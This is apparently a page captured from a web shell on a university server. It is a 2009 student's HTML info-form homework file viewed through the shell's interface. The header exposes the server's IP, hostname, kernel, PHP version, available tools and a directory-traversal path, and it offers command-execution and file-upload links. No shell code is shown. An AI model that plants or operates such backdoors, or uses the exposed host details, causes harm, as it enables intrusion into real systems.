Server IP : 172.16.15.8 / Your IP : 18.220.206.141 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/cjmock/../lgbales/../tafletcher/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File: HW3b.html Name: Tom Fletcher Class: CS 480 Inst: Dr. Wang Date: 2/17/09 --> <HTML> <Head> <Title> Info Form </Title> </Head> <Body bgcolor=green> <FONT color=orange> <Center> <H2> Info Form </H2> <hr> <p> please enter information into the fields below <FORM action=HW3b.php method=post> First Name: <input type=text size=20 name=name1> <p> Do you purchase your internet access from an ISP? <input type=radio name=answer1 value=yes checked> yes <input type=radio name=answer1 value=no> no <p> <hr> In what ways do you use the web? <p> Please check all that apply <p> <input type=checkbox name=research value=yes> For research <input type=checkbox name=purchases value=yes> To purchase items electronically <input type=checkbox name=email value=yes> To send and receive e-mail <input type=checkbox name=news value=yes> To read news <p> <p> <input type=submit value=submit> <input type=reset value=reset> <p> <a href = index.html> Home </a> </Center> </HTML>